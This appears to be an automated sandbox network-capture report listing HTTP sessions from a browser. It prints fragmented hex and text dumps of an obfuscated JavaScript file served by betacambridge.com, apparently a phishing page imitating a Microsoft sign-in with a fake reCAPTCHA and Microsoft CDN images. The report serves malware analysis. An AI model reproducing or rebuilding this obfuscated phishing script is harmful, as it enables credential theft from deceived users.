                                            Content-Type: text/javascript
                                            2024-11-18 20:15:47 UTC7929INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                            Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                            2024-11-18 20:15:47 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 78 2d 77 69 64 74 68 3a 5c 78 32 30 31 30
                                            Data Ascii: 20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x20\x20max-width:\x2010
                                            2024-11-18 20:15:47 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35 39 2c 5c 78 32 30 35 39 29 29 3b 5c 78 30 61 5c 78 32 30 5c 78
                                            Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x2059,\x2059));\x0a\x20\x
                                            2024-11-18 20:15:47 UTC8000INData Raw: 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                            Data Ascii: 0.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
                                            2024-11-18 20:15:47 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                            Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\x0a\x20\x20\x20\x20\x
                                            2024-11-18 20:15:47 UTC8000INData Raw: 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 6c 61 62 65 6c 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78
                                            Data Ascii: 43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20label\x20{\x0a\x20\x
                                            2024-11-18 20:15:47 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e
                                            Data Ascii: \x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20poin
                                            2024-11-18 20:15:47 UTC8000INData Raw: 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                            Data Ascii: gsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\
                                            2024-11-18 20:15:47 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                            Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                            2024-11-18 20:15:47 UTC8000INData Raw: 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                            Data Ascii: t\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.44974118.245.31.784432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:48 UTC568OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                            Host: cdn.socket.io
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            Origin: https://betacambridge.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:48 UTC702INHTTP/1.1 200 OK
                                            Content-Type: application/javascript; charset=utf-8
                                            Content-Length: 49993
                                            Connection: close
                                            Accept-Ranges: bytes
                                            Access-Control-Allow-Origin: *
                                            Cache-Control: public, max-age=31536000, immutable
                                            Content-Disposition: inline; filename="socket.io.min.js"
                                            Date: Sat, 03 Aug 2024 07:26:50 GMT
                                            ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                            Server: Vercel
                                            Strict-Transport-Security: max-age=63072000
                                            X-Vercel-Cache: HIT
                                            X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                            X-Cache: Hit from cloudfront
                                            Via: 1.1 7b85fc567b776c0d31c5ac07cc6c2ae6.cloudfront.net (CloudFront)
                                            X-Amz-Cf-Pop: FRA56-P8
                                            X-Amz-Cf-Id: apVux_bf2N4S_vw9RsaE1e4EZx-BZD5I-BwU4a73IJZKRKMDzWl5pQ==
                                            Age: 9668339
                                            2024-11-18 20:15:48 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                            Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                            2024-11-18 20:15:48 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                            Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                            2024-11-18 20:15:48 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                            Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                            2024-11-18 20:15:48 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                            Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.449742184.28.90.27443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:48 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            User-Agent: Microsoft BITS/7.8
                                            Host: fs.microsoft.com
                                            2024-11-18 20:15:48 UTC467INHTTP/1.1 200 OK
                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                            Content-Type: application/octet-stream
                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                            Server: ECAcc (lpl/EF4C)
                                            X-CID: 11
                                            X-Ms-ApiVersion: Distribute 1.2
                                            X-Ms-Region: prod-weu-z1
                                            Cache-Control: public, max-age=160176
                                            Date: Mon, 18 Nov 2024 20:15:48 GMT
                                            Connection: close
                                            X-CID: 2


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.449743192.232.223.484432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:48 UTC351OUTGET /n/jsnom.js HTTP/1.1
                                            Host: betacambridge.com
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:48 UTC263INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:48 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Thu, 14 Nov 2024 16:58:58 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 100217
                                            Vary: Accept-Encoding
                                            Content-Type: text/javascript
                                            2024-11-18 20:15:48 UTC7929INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                            Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                            2024-11-18 20:15:48 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 78 2d 77 69 64 74 68 3a 5c 78 32 30 31 30
                                            Data Ascii: 20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x20\x20max-width:\x2010
